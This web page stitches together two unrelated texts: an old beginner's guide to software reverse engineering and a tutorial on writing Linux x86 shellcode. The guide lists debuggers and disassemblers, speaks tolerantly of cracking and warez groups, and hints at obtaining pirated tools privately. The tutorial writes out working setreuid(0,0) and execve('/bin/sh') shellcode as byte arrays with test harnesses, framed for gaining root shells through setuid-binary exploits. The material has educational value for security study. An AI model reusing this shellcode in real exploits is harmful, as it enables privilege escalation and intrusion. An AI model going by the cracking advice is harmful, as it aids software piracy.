Reverse Engineering
Reverse Engineering Guide

If you are considering studying the art of software reverse engineering, then this guide below is for you. I'll try to outline here everything you need to know and do (of course this is by no means an exhaustive list or guarantee that you'll become a reversing god overnight but it might just get you started in a whole new world). If you are at all serious then you should take heed and the time to download all of my recommended materials, all the time you invest learning now will serve you well in the future. It will also be worth your while to visit some of the other sites I've linked too on the web. After reading this document and attempting the 2 small sample programs I've made available you'll know whether or not this really is the art for you.

What is Reverse Engineering (precisely)?

Software reverse engineering is the art and process of understanding the intricacies of your own and commercial software at a lower level than the compiler, a fuller definition can be found here. Many reversers focus initially on the various protection schemes used by software writers to disable or otherwise prohibit the full use of their software since this is a convenient (if somewhat legally dubious) starting point with a definite challenge and end point. I personally however have used the knowledge I have gained through 'reversing' to :

i). Produce my own custom tools for circumventing / identifying protections.
ii). Recover usable source code to lost projects.
iii). Identify and understand how specific functionality is implemented.
iv). Debug hard to find errors.
v). Perform analysis of potentially hostile programs.

Sometimes reverse engineering can be the only way out of a development tight spot, however it is not a decision to be taken lightly.

Reverse Engineering is NOT cracking per se, although it is sometimes difficult to draw the fine line between them in the early stages. Most reversers deplore the tens of thousands of warez sites that waste good server space on the web (you probably know them already). If you are looking for easy cracks, key generators or just serial numbers lists then this site and reverse engineering will NOT be for you, even though this information can be obtained with fairly minimal effort I expect most warez aficionados will not find themselves reading this in the first place and certainly won't have a clue how to code, assemble and link a key generator, let alone spend hours upon end studying assembly routines.

By learning to reverse engineer yourself, you are gaining a set of valuable and marketable skills (malware analysis, intellectual property rights management and anti-virus / vulnerability research are booming industries), thus distinguishing yourself from the many losers who would rather waste their time searching through pages of bloated graphics and commercial porn sponsors than learning anything themselves. You'll also find (over a period of time) that your reversing efforts will become less focused on protection schemes and that your interest will move away from simple protection cracking, who knows, perhaps a job in hostile code analysis beckons.....

What do I need to know / learn ?

To learn reverse engineering from scratch you will probably need to spend a significant amount of time enhancing your low level knowledge, don't think you can crack any target you fancy by just learning ad nauseam simple techniques. A familiarity with the x86 architecture and instruction set is essential, an awareness of the 6 basic digital logic circuits (binary) will also be useful (AND/OR (inclusive), NOT, NAND, NOR & exclusive OR (XOR)).

I recommend the following reading resources :-

Art of Assembly Language :- A 25 chapter PDF guide to virtually everything you might ever want to know about x86 processors. These documents are very complete yet reading them all will probably take you in excess of a few years so read just the first few chapters and keep the rest like Chapter 14 on the FPU for reference purposes as you improve / require.

HelpPC :- A 220k quick and convenient DOS instruction viewing program from 1991. If you've forgotten a particular assembler command or need to quickly look up how many clocks a particular instruction takes, then this is the guide for you (it is somewhat dated though).

Iczelion's Win32 ASM Resources :- A great site with literally tons of useful resources. Download everything there :-). If you want to really 'get into' windows assembly language programming there isn't much better for free than Iczelion's tutorials.

Intel Developer Manuals :- Anything you ever wanted to know about the nitty-gritty internals of your x86. I recommend Volume 3 (System Programming). I have been told recently that the previous link does not lead to all 3 manuals, you might like to try this link instead. You could also search for 386intel.txt for a good overview. Update 2004 : I believe now the Developer manuals now stretch to 4 guides, either way you shouldn't have much problem finding them.

Mammon_'s Tales to his Grandson & Mammon_'s coming to the Iceage :- 2 definitive guides to configuring your SoftICE and synopses of the main 3 disassemblers by one of the very best reverse engineers out there (25k). Mammon_ abandoned the Windows scene a considerable amount of years ago, an eccentric and enigmatic character, his website still makes for fascinating reading.

Nolan Blender's "Making Tools Work Together" :- How you can use IDA & SoftICE to maximum effect (related to FLEXlm but applicable elsewhere).

PC Assembly Tutorial :- Dr Paul Carter's free introduction to assembly language (32-bit) using NASM (since its free), taught previously as a university course. Recommended.

Ralph Browns Interrupt List :- A maintained list of all DOS BIOS/Interrupt Services, most of the time you'll be looking for subfunctions of INT 10/13/21. Invaluable for older 16-bit programs or coding your own graphics demos / key generators (even understanding old virii). Somewhat dated now thus I've changed my recommendation from learning this to keeping it just for reference.

Getting and Setting up your Tools

*Updated 2007* : CompuWare have now officially ceased all development upon SoftICE as a product, those of us who watch the scene closely could see this coming for sometime, the text below I leave now as a dedication to the past. Farewell.

Any reverser will tell you that you will only ever be as good as the tools you use and the competency with which you use and customise them. Your best weapons are your tools, invest the time learning how to use them. I suggest you obtain at the minimum the following (either download them from my tools page (if the links are even working) or locate them around the web using various searching techniques).

- A Windows (preferably protected-mode) Debugger - The standard tool in this category is NuMega's SoftICE which can trace just about anything, you will not break some protections without it. Download the versions relevant to the platform you plan to investigate, better still download every version you can. Pre-2000 most of my guides use v3.2x/v4.0x for Windows 98. Pay a regular visit also to CompuWare's (formerly NuMega's) web site to keep informed of any new developments, these guys really know how to produce useful tools (need I also mention BoundsChecker & SmartCheck). Its also worth hunting down the various homepages and articles by (ex & current) NuMega developers, need I mention Matt Pietrek & John Robbins ;-).

* The advent of more recent Microsoft OS's (Windows 2000, XP) & CompuWare's acquisition of NuMega requires that you now source SoftICE as part of a CompuWare package; in fact I've heard that CompuWare won't even sell legitimate developers SoftICE standalone any longer.

DriverStudio (approx. size 184Mb's)

* Requires Installation Serial Number + FLEXlm license

DriverWorks
DriverNetworks
VtoolsD
SoftICE / Visual SoftICE
Boundschecker / TrueTime / TrueCoverage

The sale of NuMega to CompuWare also seems to have contributed to a major decline in quality control, many users have reported significant problems with SoftICE under the newer OS's, most of these relate to breakpoints not behaving as they should. There are some workarounds and custom patches, which you might find on the RCE MessageBoard (use the search facility), a lot of reversers however have given up trying to get SoftICE to behave reliably and have resorted instead to using the capable ring 3 debugger OllyDbg. This has also the added capacity to work under VMWare which seems to be all the rage right now.

SoftICE symbols

Getting debug symbols loaded into SoftICE can be a challenge to say the least, before attempting to do so, make sure that you download and install the latest 'Debugging Tools for Windows' from Microsoft. Next replace all copies of symsrv.dll & dbghelp.dll installed by DriverStudio with those from the Debugging Tools folder, if I remember rightly the DriverStudio root directory, the SoftICE root directory and the SymbolRetriever subdirectory all have copies of those files that need to be replaced. Also be sure that your 'Path to NMS' is set to a directory that exists.

SoftICE under VMWare

This advice from my good friend nc. If you browse to your VM directory on the hard disk and open the config file in a text editor (.vmx file), add the following lines to the config file :

vmmouse.present = FALSE
svga.maxFullscreenRefreshTick = 5

If you want to verify that SoftICE is working correctly, try the following advice that I shamelessly borrowed from Kayaker.

"If you break at the start of a program with the SoftICE loader (assuming you can), and set a breakpoint say a few lines down, either on an address or an API call - does SoftICE break? It should. Make sure you set your bp *while in the context* of the application you want to break into. This is irrespective of the ADDR command, which you shouldn't have to use since you're already in the correct context. In other words, don't expect to be able to just change the context with ADDR from the desktop and have a reliable bp set. If you do, you also need to specify the CS: portion of the address else you'll set up a bp with the wrong code segment. If all else fails, you could try BPM x breakpoints, they can be more reliable than BPX bp's for "sticking". However, they especially should be set while *in* the context of the app.

This small table should provide you with a means to identify which version of SoftICE you have installed on your system.

 

DriverStudio v2.7 SoftICE, DriverWorkbench, BoundsChecker, TrueTime, TrueCoverage, DriverWorks, DriverNetworks, VtoolsD (requires installation serial number only). NTICE.sys file version 4.0.1381, product version 4.2.7 (Build 562). osinfo.dat (191,340 bytes).
DriverStudio v3.1 As v2.7, also Visual SoftICE (requires installation serial number + FLEXlm license). NTICE.sys file version 5.1.2601.0, product version 4.3.1 (Build 1722). osinfo.dat (304,588 bytes), osinfob.dat (200,027) bytes.
DriverStudio v3.2 As v3.1. NTICE.sys file version 4.3.2.2485, product version 4.3.2 (Build 2485). osinfo.dat (350,737 bytes), osinfob.dat (375,319 bytes).
Latest from Compuware FTP N/A. osinfo.dat (474,346 bytes). osinfob.dat (356,884 bytes - most likely out of date).
DriverStudio v3.2.1 Update As v3.1. *Update Only* here (1.65Mb). NTICE.sys file version 3.2.1 (Build 2560), product version 3.2.1 (Build 2560). osinfo.dat (474,346 bytes). osinfob.dat (356,884 bytes).

As SoftICE is virtually every reversers choice of debugger, some of the more intelligent protections will use various techniques to detect its presence. More likely than not you can find a way around most of these yet in certain cases e.g. Hardlock's wrapper and VBox, you'll need to identify precisely the trick before you can work around it, Hardlock is particularly nasty because after disabling the CreateFileA detection you'll wind up with a frozen computer. In said circumstances an alternative debugger can be very useful, such possibilities include Borland's Turbo Debugger (included with TASM & BC++), Microsoft's WinDbg and LiuTaoTao's superb TRW, you know where to look for these :-).

OllyDbg is now highly recommended as the best alternative if your system simply won't take to SoftICE.

- A Disassembler - There are probably 2 main choices for this category, the quicker but less technical W32Dasm v8.9x from URSoftware and the slower more advanced Intelligent Disassembler Pro from Data Rescue. The differences between these 2 are immense, however for instances where you need a quick 'dumb deadlisting' W32Dasm may suffice, serious analysis and analysts however choose IDA. If you have a few spare moments you might also care to investigate some of the older disassemblers such as Sourcer (more for DOS) and WCB for Windows 3.1 although these are largely obsolete. The choice between the main 2 here is really a question of personal preference. Visual Basic v3 and v4 decompilers are also available, although I've never had a great deal of luck with the VB4 edition. For VB5 & VB6 there exists now a p-code debugger courtesy of the WKT team.

If you are really interested in disassemblers then you should check out dsassm02e, a Win32 disassembler written by a South Korean professor, visit his homepage here and download the program with full C source code. Web searchers might like to try looking for material written by Australian Christina Ciffuentes, especially her thesis on decompiling to recover source code.

- A HEX Editor - In this category there at least a dozen choices, most reversers will however develop their favourite, mine being DOS Hiew. Conventional search engines (e.g. the Simtel archive) will find at least 30 HEX editors (some better than others), of the many out there in the woods the following seem to be popular with reversers. Hex Workshop, UltraEdit, HEdit (* note HEdit appears now to be unsupported) you should of course learn how to reverse your tools first)).

- Our Tools - Progress is constantly being made in this area (although it is sporadic), this section is probably out of date several weeks after I write it. Retrospectively, arguably the 2 best developments have been IceDump by The Owl et al & ProcDump courtesy of G-RoM & Stone (now integrated into IceDump). Many other tools have also made an appearance, for example r!sc has done some very good work in the unpacking and CD protection fields, others have contributed with unpackers for specific packers (check out the Unpacking Gods webpage if you can) & Tsehp has contributed Revirgin.

The games scene has also pushed forward the boundaries of our tools, an entire scene is now built around in-memory patching (or 'training') courtesy of Stone and others delving inside the Win32 debug API. In late 1999 Stone's Webnote (a very interesting collection of his own exploits) disappeared from the web, for personal reasons he is reluctant to ever re-upload it, a decision you might not agree with but should respect, a final archive of some of the very interesting material on his site can be found here (1.08Mb's, 1,141,940 bytes).

- Support Tools, room must also be found in any reversers toolbox for the following tools :-

i) File Monitoring (FileMon) & Registry Monitoring (RegMon) from the wizards at SysInternals.
ii) InstallShield script decompiling (isDCC, Wisdec).
iii) Installation Monitoring (CleanSweep from Quarterdeck).
iv) Resource Editor (BRW 4.5, eXeScope, Symantec Resource Studio, Resource Hacker, Restorator).

Cracking Etiquette

Indeed, there is such a thing as the above. When starting out you should probably adhere closely to these pieces of advice else you might make some very nasty enemies (this applies mainly to IRC and message boards).

i) DON'T the first time you join one of these forums issue long lists of requests for tools, specifically SoftICE and IDA. At best you'll be politely told to "learn how to search" and at worst you'll be flamed out of existence, not a great way to make friends in this world. However, there are ways and means of obtaining said tools, public forums being not the place. I know that many reversers in private will help you obtain what you need, yet you'll need to develop some skills identifying those that might help and those that will never.

ii) When you've actually cracked a few programs it is very easy to become aloof and maybe somewhat egotistical, I know this to my cost because I've been there and done it too. As a general rule, its best never to boast or be cocky, trust me someone out there knows more than you & will eventually shoot you down in flames no matter how clever you think you are ;-), you aren't compelled to reply to 'lamer requests' so maintaining a respectful silence is often 10x more effective. No-one on a message board appreciates a reply to a request for help along the lines of "man, you must be stupid, I cracked that in 5 minutes", real help rather than ridicule is the order of the day.

iii) Joining warez groups is a matter for your own consciences, I would guess 50% of the community deplores such groups and 50% tolerates them, I'm one of the tolerant group because you may be able to obtain some very interesting specific targets from these sources, naturally I wouldn't dream of cracking these targets or making them available for the losers to download for free of course. If you are offered hardware incentives to crack for any group you should turn it down immediately (unless of course you have a very secure place to send it).

iv) If you should encounter me on IRC not following my own rules be sure to tell me I'm a hypocrite ;-). The reversing community is much like any other, "do unto others as you would have them do unto you", apply basic common sense and you won't go far wrong.

Designing Shellcode, Demystified
In our previous paper, Buffer Overflows Demystified, we told you that

there will be more papers on these subjects. We kept our promise. Here is the
second paper from the same series. The paper is about the fundamentals of
shellcode design and totally Linux 2.2 on IA-32 specifig. The base principles
apply to all architectures, whereas the details might obviously not.

ftp://download.intel.com/design/Pentium4/manuals/24547008.pdf

http://www.enderunix.org/documents/en/sc-en.txt

 

WHAT'S SHELLCODE?
In our previous paper, i told several times that, once we get control
over the execution of the target program, we can run anycode we want, let's
remember:

"strcpy() copied large_one to foo, without bounds checking, filling
the whole stack with A, starting from the beginning of foo1, EBP-16.

Now that we could overwrite the return address, if we put the address
of some other memory segment, can we execute the instructions there?
The answer is yes.

Assume that we place some /bin/sh spawning instructions on some memory
address, and we put that address on the function's return address that
we overflow, we can spawn a shell, and most probably, we will spawn a
rootshell, since you'll be already interested with setuid
binaries." [5]

Again, if you would recall, the instructions the CPU will likely to run are
placed in some portion of memory. What we simply do is to place our code
somewhere in the memory and make EIP point to it.

We name these assembly instructions "the shellcode". To use it within an
exploit, we put their hexadecimal opcodes in a character array.

Several methods are available to get those instructions:
1. Write directly in hexcode
2. Write the assembly instructions, then extract the opcodes
3. Write in C, extract assembly instructions and then opcodes

We'll first use the third method and try to run some system calls like exit.
Soon, we'll write a shellcode to spawn a new shell.

The code we'd like to run will usually be the execution of a system program,
e.g. spawning a root shell or binding a root shell to a newly created socket
if it'll run remotely. When we talk about "executing a program", we mean
"calling a kernel service which will be responsible for creating and executing
a new system process". These services run in the most privileged CPU mode,
namely kernel mode. We'll need an entry to the kernel for these sort of servi-
ces. These services are available to userspace programs via system calls.
Thus, to understand what's all about shellcode, we'll first need to dive into
system calls.

SYSTEM CALLS

Entrances into the kernel can be categorized according to the event or action
that initiates it:

1. Hardware Interrupt
2. Hardware trap
3. Software initiated trap

Hardware interrupts arise from external events, such as an I/O device needing
attention or a clock reporting passage of time. Hardware interrupts occur
asynchronously and may not relate to the context of the currently executing
process.

Hardware traps may be either synchronous or asynchronous, but are related to
the current executing process. Examples of hardware traps are those generated
as a result of an illegal arithmetic operation, such as divide by zero.

Software initiated traps are used by system to force the scheduling of an event
such as process rescheduling or network processing, as soon as possible. System
calls are a special case of a software initiated trap -the machine instruction
used to initiate a system call typically causes a hardware trap that is handled
specially by the kernel. The most frequent trap into the kernel (after clock
processing) is a request to do a system call. The system call handler must do
the following work:

1. Verify that the parameters to the system call are located at a valid user
address and copy them from the user's address space into the kernel

2. Call a kernel routine that implements the system call [2]

There are two mechanism under Linux for implementing system calls:
1. lcall7/lcall27 gates
2. INT 0x80 software interrupt

Native Linux programs use int 0x80 whilst binaries from foreign flavors of UNIX
(Solaris, UnixWare 7 etc.) use the lcall7 mechanism. The name "lcall7" is his-
torically misleading because it also covers lcall27 (e.g. Solaris/x86), but the
handler function is called lcall7_func.

When the system boots, the function arch/i386/kernel/traps.c:trap_init() is
called which sets up the IDT (Interrupt Descriptor Table) so that vector 0x80
(of type 15, dpl 3) points to the address of system_call entry from
arch/i386/kernel/entry.S.

When a userspace application makes a system call, the arguments are passed via
registers and the application executes 'int 0x80' instruction. This causes a
trap into kernel mode and processor jumps to system_call entry point in entry.S.
What this generally does is:

1. Save registers
2. Conduct some sanity checking
3. Call the particular system_call handler function to handle the system call.
[3]

EAX register denotes the specific system call. Other registers have relative
meanings according to the value in EAX register.

To give an example, let us assume that a process requested _exit. Before
going into kernel mode, the underlying library functions set EAX to 0x1
which denotes sys_exit, set EBX the parameter given to exit() and executes
int 0x80. When the trap occurs, kernel locates the appropriate handler routine.
In this scenario, since EAX is 0x1, kernel/exit.c:sys_exit is executed.
This function operates according to the value that is present in EBX register.

Now that we've gone through the mechanisms involved in system calls and how
they actually work, we can start invoking them from our assembly instructions.
Once we get the instructions, we'll find the hexadecimal opcode for them,
put them in an array and create our shellcode.

EXIT SHELLCODE

Let's first code in C, and see for ourselves:

 

$ export CFLAGS=-g

{codecitation style="brush: cpp;"}

----------------------- c-exit.c ------------------------------
#include

main()
{
exit(0);
}
----------------------- c-exit.c ------------------------------

{/codecitation}

 

$ make c-exit
cc -g c-exit.c -o c-exit
$ gdb ./c-exit
(gdb) b main
Breakpoint 1 at 0x80483b7: file c-exit.c, line 5.
(gdb) r
Starting program: /home/balaban/sc/./c-exit
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.

Breakpoint 1, main () at c-exit.c:5
5 exit(128);
(gdb) disas _exit
Dump of assembler code for function _exit:
0x400a5ee0 : mov %ebx,%edx
0x400a5ee2 : mov 0x4(%esp,1),%ebx
0x400a5ee6 : mov $0x1,%eax
0x400a5eeb : int $0x80
--kesildi---

End of assembler dump.
(gdb)

As you can see above, standart library function exit sets EAX to 0x1
and EBX to the parameter pushed onto the stack(parameter to the function,
which is the actual exit status).

So, here are the instructions for exit(0):
XOR %EBX, %EBX /* return code for exit(), set EBX zero.*/
MOV $0x1, %EAX /* sys_exit */
INT 0x80 /* Generate trap */

http://world.std.com/~slanning/asm/syscall_list.html

sys_exit is defined as such:

%eax Name Source %ebx %ecx %edx %esx %edi
1 sys_exit kernel/exit.c int - - - -

We can write the instructions inline in a C function:

{codecitation style="brush: cpp;"}

----------------------- a-exit.c ------------------------------
main()
{
__asm__("
xorl %ebx, %ebx
mov $0x1, %eax
int $0x80
");

}
----------------------- a-exit.c ------------------------------

{/codecitation}

We can trace the system calls within a program's execution time with
strace:

$ strace ./a-exit
execve("./a-exit", ["./a-exit"], [/* 32 vars */]) = 0
brk(0) = 0x80494d8

--- snipped ---

_exit(0) = ?
$

 

As you can see, exit(0) has been executed!

We can move onto another sytem call:
setreuid(0, 0)

Sometimes we may be in need of some "privilege restoration routines" which
restore a given process' root privileges whenever they are processed by it
but are temporarily unavailable because of some security reasons. These
routines are especially useful for exploiting vulnerabilities in certain
setuid binaries, the ones that revert but do not completely drop their ele-
vated privileges. setreuid is one of them, and sets the process' real and
effective user ids. [4]

From the above given URI, you can get some information about this system
call:

 

%eax Name Source %ebx %ecx %edx %esx %edi
70 sys_setreuid kernel/sys.c uid_t uid_t - - -

Same principles apply here. We set EAX 0x46 which is sys_setreuid's value,
EBX to the real userid and ECX to the effective userid.

{codecitation style="brush: cpp;"}

----------------------- a-setreuid.c ------------------------------

main()
{
__asm__("
xorl %ebx, %ebx
xorl %ecx, %ecx
mov $0x46, %eax
int $0x80
xorl %ebx, %ebx
mov $0x1, %eax
int $0x80
");

}

----------------------- a-setreuid.c ------------------------------

{/codecitation}

xorl %ebx, %ebx
Set EBX register 0. If you XOR some number with itself, you get zero.
Remeber that EBX is the real userid part.

xorl %ecx, %ecx
ECX = effective userid = 0

mov $0x46, %eax
EAX = 0x46.

int $0x80
Dive into kernel mode.

Other instructions after this are the ones for exit(0);

$ make a-setreuid
cc a-setreuid.c -o a-setreuid
$ su
# strace ./a-setreuid
execve("./a-setreuid", ["./a-setreuid"], [/* 31 vars */]) = 0
brk(0) = 0x80494e4

---- snipped ----

setreuid(0, 0) = 0
_exit(0) = ?
#

http://www.gnu.org/manual/gdb-4.17/html_chapter/gdb_9.html#SEC56

$ gdb ./a-setreuid
(gdb) disas main
Dump of assembler code for function main:
0x8048380 : push %ebp
0x8048381 : mov %esp,%ebp
0x8048383 : xor %ebx,%ebx
0x8048385 : xor %ecx,%ecx
0x8048387 : mov $0x46,%eax
0x804838c : int $0x80
0x804838e : xor %ebx,%ebx
0x8048390 : mov $0x1,%eax
0x8048395 : int $0x80
0x8048397 : leave
0x8048398 : ret
End of assembler dump.
(gdb) x/bx main+3
0x8048383 : 0x31
(gdb) x/bx main+4
0x8048384 : 0xdb
(gdb) x/bx main+5
0x8048385 : 0x31
(gdb) x/bx main+6
0x8048386 : 0xc9
(gdb) x/bx main+7
0x8048387 : 0xb8
(gdb) x/bx main+8
0x8048388 : 0x46
(gdb) x/bx main+9
0x8048389 : 0x00
(gdb) x/bx main+10
0x804838a : 0x00
(gdb) x/bx main+11
0x804838b : 0x00
(gdb) x/bx main+12
0x804838c : 0xcd
(gdb) x/bx main+13
0x804838d : 0x80
(gdb) x/bx main+14
0x804838e : 0x31
(gdb) x/bx main+15
0x804838f : 0xdb
(gdb) x/bx main+16
0x8048390 : 0xb8
(gdb) x/bx main+17
0x8048391 : 0x01
(gdb) x/bx main+18
0x8048392 : 0x00
(gdb) x/bx main+19
0x8048393 : 0x00
(gdb) x/bx main+20
0x8048394 : 0x00
(gdb) x/bx main+21
0x8048395 : 0xcd
(gdb) x/bx main+22
0x8048396 : 0x80
(gdb)

Our shellcode:


{codecitation style="brush: cpp;"}

----------------------- s-setreuid.c ------------------------------
char sc[] = "\x31\xdb" /* xor %ebx, %ebx */
"\x31\xc9" /* xor %ecx, %ecx */
"\xb8\x46\x00\x00\x00" /* mov $0x46, %eax */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xor %ebx, %ebx */
"\xb8\x01\x00\x00\x00" /* mov $0x1, %eax */
"\xcd\x80"; /* int $0x80 */

main()
{
void (*fp) (void);

fp = (void *)sc;
fp();
}
----------------------- s-setreuid.c ------------------------------

{/codecitation}

$ su
# make s-setreuid
cc s-setreuid.c -o s-setreuid
# strace ./s-setreuid
execve("./s-setreuid", ["./s-setreuid"], [/* 31 vars */]) = 0
brk(0) = 0x80494f8

---- snipped

setreuid(0, 0) = 0
_exit(0) = ?
#


{

As seen, the same effect with the shellcode.

SHELL SPAWNING SHELLCODE

This is the sweetest part. Basing what we've learnt so far, lets try
coding a shellcode which spawns an interactive shell. The first thing we should
do is to analyze execve system call a little bit in detail. Go to the URI I've
given above and get some idea:

%eax Name Source %ebx %ecx %edx %esx %edi
11 sys_execve arch/i386/kernel/process.c struct pt_regs - - - -

EBX has the address of pt_regs structure. Not much explanatory. The handler is
in arch'i386/kernel/process.c. Let's see it:

/*
* sys_execve() executes a new program.
*/
asmlinkage int sys_execve(struct pt_regs regs)
{
int error;
char * filename;

filename = getname((char *) regs.ebx);
error = PTR_ERR(filename);
if (IS_ERR(filename))
goto out;
error = do_execve(filename, (char **) regs.ecx, (char **) regs.edx, ®s);
if (error == 0)
current->ptrace &= ~PT_DTRACE;
putname(filename);
out:
return error;
}

As you'd notice, EBX register has the address of the command, which, in this
scenario, is the address of string "/bin/sh". We cannot get any more clue as
to what ECX and EDX do. However look, the routine calls another function,
do_execve and passes these addresses to that. To understand what these
really are, we need to go further:

From fs/exec.c:

int do_execve(char * filename, char ** argv, char ** envp, struct pt_regs * regs)

Here, it's obvious that ECX has the address of argv[] and EDX has the address
of env[]. They are pointers to character arrays. Environment variables can be
set to NULL, which means we can have a zero in EDX, however, we need to supply
argv[0] the name of the program at least. Since argv[] will be NULL terminated,
argv[1] will be zero also.

So we'll need to:
* have the string "/bin/sh" somewhere in memory
* write the address of that into EBX
* create a char ** which holds the address of the former "/bin/sh"
and the address of a NULL.
* write the address of that char ** into ECX.
* write zero into EDX.
* issue int 0x80 and generate the trap.

Let's start typing:

First write a NULL terminated "/bin/sh" into memory. We can do this by pushing
a NULL and an adjacent "/bin/sh" into stack:

create a NULL in EAX. This will be used for terminating the string:

 

xorl %eax, %eax

push that zero (null) into stack:
pushl %eax

push "//sh":
pushl $0x68732f2f

push "/bin":
pushl $0x6e69622f

At this moment, ESP points at the starting address of "/bin/sh". We can safely
write this into EBX:
movl %esp, %ebx

EAX is still zero. We can use this to terminate char **argv:
pushl %eax

If we push the address of "/bin/sh" into stack too, the address of the pointer
to character array argv will be at ESP. In this way, we have created the
char **argv in the memory:
pushl %ebx

And write the address of argv into ECX:
movl %esp, %ecx

EDX may happily be zero.
xorl %edx, %edx

sys_execve = 0xb. That should be in EAX:
movb $0xb, %al

Trigger the interrupt and enter kernel mode:
int $0x80

{codecitation style="brush: cpp;"}

----------------------- sc.c ------------------------------

main()
{
__asm__("
xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp, %ebx
pushl %eax
pushl %ebx
movl %esp, %ecx
xorl %edx, %edx
movb $0xb, %eax
int $0x80"
);
}

----------------------- sc.c ------------------------------

{/codecitation}

$ make sc
cc -g sc.c -o sc
$ ./sc
sh-2.04$

It works. Let's find the opcode line by line and construct our shellcode:

$ gdb ./sc
(gdb) disas main
Dump of assembler code for function main:
0x8048380 : push %ebp
0x8048381 : mov %esp,%ebp
0x8048383 : xor %eax,%eax
0x8048385 : push %eax
0x8048386 : push $0x68732f2f
0x804838b : push $0x6e69622f
0x8048390 : mov %esp,%ebx
0x8048392 : push %eax
0x8048393 : push %ebx
0x8048394 : mov %esp,%ecx
0x8048396 : xor %edx,%edx
0x8048398 : mov $0xb,%al
0x804839a : int $0x80
0x804839c : leave
0x804839d : ret
End of assembler dump.
(gdb) x/bx main+3
0x8048383 : 0x31
(gdb) x/bx main+4
0x8048384 : 0xc0
(gdb)
0x8048385 : 0x50
(gdb)
0x8048386 : 0x68
(gdb)
0x8048387 : 0x2f
(gdb)
0x8048388 : 0x2f
(gdb)
0x8048389 : 0x73
(gdb)
0x804838a : 0x68
(gdb)
0x804838b : 0x68
(gdb)
0x804838c : 0x2f
(gdb)
0x804838d : 0x62
(gdb)
0x804838e : 0x69
(gdb)
0x804838f : 0x6e
(gdb)
0x8048390 : 0x89
(gdb)
0x8048391 : 0xe3
(gdb)
0x8048392 : 0x50
(gdb)
0x8048393 : 0x53
(gdb)
0x8048394 : 0x89
(gdb)
0x8048395 : 0xe1
(gdb)
0x8048396 : 0x31
(gdb)
0x8048397 : 0xd2
(gdb)
0x8048398 : 0xb0
(gdb)
0x8048399 : 0x0b
(gdb)
0x804839a : 0xcd
(gdb)
0x804839b : 0x80
(gdb)

{codecitation style="brush: cpp;"}

----------------------- sc.c ------------------------------

char sc[] =
"\x31\xc0" /* xor %eax, %eax */
"\x50" /* push %eax */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* mov %esp,%ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp,%ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */

main()
{
void (*fp) (void);

fp = (void *)sc;
fp();
}

----------------------- sc.c ------------------------------

{/codecitation}

$ make s-sc
cc -g s-sc.c -o s-sc
$ ./s-sc
sh-2.04$

 

LAST WORDS
Using the afore mentioned logic, one can construct millions of fantastic
shellcode. What is necessary is a little bit attention.